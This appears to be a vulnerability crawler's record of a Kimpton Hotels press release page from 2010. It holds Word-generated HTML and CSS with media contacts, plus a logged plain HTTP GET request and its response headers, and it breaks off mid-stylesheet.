<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>colleenm</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>1</o:TotalTime> <o:LastPrinted>2010-03-04T00:43:00Z</o:LastPrinted> <o:Created>2010-03-04T00:44:00Z</o:Created> <o:LastSaved>2010-03-04T00:44:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>1007</o:Words> <o:Characters>5744</o:Characters> <o:Lines>47</o:Lines> <o:Paragraphs>11</o:Paragraphs> <o:CharactersWithSpaces>7054</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:SimSun; panose-1:0 0 0 0 0 0 0 0 0 0; mso-font-alt:\00CB\00CE\00CC\00E5; mso-font-charset:134; mso-generic-font-family:auto; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:16777216 3592 268435456 0 1024 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:windowtext;}h1 {mso-style-next:Normal; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:1; layout-grid-mode:char; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:SimSun; color:windowtext; mso-font-kerning:0pt; mso-fareast-language:ZH-CN; font-weight:bold; mso-bidi-font-weight:normal;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:windowtext;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:windowtext;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:windowtext;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p {mso-margin-top-alt:auto; margin-right:0in; margin-bottom:12.0pt; margin-left:0in; mso-line-height-alt:11.25pt; mso-pagination:widow-orphan; font-size:13.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:#444444;}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:windowtext; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Tahoma; color:windowtext;}p.Char1, li.Char1, div.Char1 {mso-style-name:" Char1"; mso-style-noshow:yes; margin-top:0in; margin-right:0in; margin-bottom:8.0pt; margin-left:0in; text-align:justify; line-height:12.0pt; mso-line-height-rule:exactly; mso-pagination:none; mso-layout-grid-align:none; font-size:10.0pt; font-family:Verdana; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Verdana; color:windowtext;}span.apple-style-span {mso-style-name:apple-style-span;}p.Default, li.Default, div.Default {mso-style-name:Default; mso-style-parent:""; margin:0in; margin-bottom:.0001pt; line-height:normal; mso-pagination:none; mso-layout-grid-align:none; text-autospace:none; font-size:12.0pt; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial; color:black;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:45.0pt .9in .8in .9in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:40987380; mso-list-type:hybrid; mso-list-template-ids:1617186278 180654248 197641 328713 66569 197641 328713 66569 197641 328713;}@list l0:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:49.5pt; mso-level-number-position:left; margin-left:49.5pt; text-indent:-31.5pt; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Wingdings;}@list l1 {mso-list-id:62340374; mso-list-type:hybrid; mso-list-template-ids:-484679500 491012386 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l1:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Wingdings;}@list l1:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2 {mso-list-id:75329703; mso-list-type:hybrid; mso-list-template-ids:842294488 -25535006 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:\F0D8; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}@list l3 {mso-list-id:198445242; mso-list-type:hybrid; mso-list-template-ids:-653597426 328713 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l4 {mso-list-id:578759532; mso-list-type:hybrid; mso-list-template-ids:1908186806 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; font-family:Symbol;}@list l5 {mso-list-id:1649477657; mso-list-type:hybrid; mso-list-template-ids:-1886230016 328713 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l6 {mso-list-id:1707755852; mso-list-type:hybrid; mso-list-template-ids:1565451938 328713 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l6:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Wingdings;}@list l6:level3 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l6:level4 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6:level5 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Wingdings;}@list l6:level6 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l7 {mso-list-id:2115246097; mso-list-type:hybrid; mso-list-template-ids:-217268626 328713 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.75in; mso-level-number-position:left; margin-left:.75in; text-indent:-.25in; font-family:Wingdings;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><h1><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1027" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1027"><![endif]></span><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-weight:bold'><o:p></o:p></span></h1><p class=MsoNormal><span style='mso-fareast-language:ZH-CN'><o:p>&nbsp;</o:p></span></p><h1 style='text-align:justify'><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;font-weight:normal;mso-bidi-font-weight:bold'>Media Contacts:<spanstyle='mso-tab-count:1'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><o:p></o:p></span></i></h1><h1 style='text-align:justify'><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-weight:bold'><o:p>&nbsp;</o:p></span></i></h1><h1 style='text-align:justify'><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-weight:bold'>M. Silver Associates<o:p></o:p></span></i></h1><p class=MsoNormal style='text-align:justify'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-fareast-language:ZH-CN'>Maria Ronan / 212-754-6500 ext. 230 / </span></i><spanlang=FR style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-ansi-language:FR;mso-fareast-language:ZH-CN;mso-ansi-font-style:italic'><ahref="mailto:maria@msilver-pr.com"><i style='mso-bidi-font-style:normal'><spanlang=EN-US style='mso-ansi-language:EN-US'>maria@msilver-pr.com</span></i></a></span><istyle='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-fareast-language:ZH-CN'> <o:p></o:p></span></i></p><p class=MsoNormal style='text-align:justify'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-fareast-language:ZH-CN'>Aik Wye Ng / 212-754-6500 ext. 260 / </span></i><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-fareast-language:ZH-CN;mso-ansi-font-style:italic'><ahref="mailto:aikwye@msilver-pr.com"><i style='mso-bidi-font-style:normal'>aikwye@msilver-pr.com</i></a><istyle='mso-bidi-font-style:normal'><span style="mso-spacerun: yes">&nbsp;</span><o:p></o:p></i></span></p><p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></i></b></p><p class=MsoNormal style='text-align:justify'><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Kimpton Hotels<o:p></o:p></span></i></b></p><p class=MsoNormal style='text-align:justify'><i style='mso-bidi-font-style:normal'><span style='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Stacey Ellis / 415-955-5492 / </span><..
- /pdfs/press/html/Sweet-Tax-Relief-0310/index.html

/pdfs/press/html/Sweet-Tax-Relief-0310/index.html

http://www.kimptonhotels.com/pdfs/press/html/Sweet-Tax-Relief-0310/index.html

Request

GET /pdfs/press/html/Sweet-Tax-Relief-0310/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 32628
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>2</o:TotalTime> <o:LastPrinted>2010-03-04T00:44:00Z</o:LastPrinted> <o:Created>2010-03-04T00:44:00Z</o:Created> <o:LastSaved>2010-03-04T00:44:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>635</o:Words> <o:Characters>3621</o:Characters> <o:Lines>30</o:Lines> <o:Paragraphs>7</o:Paragraphs> <o:CharactersWithSpaces>4446</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; 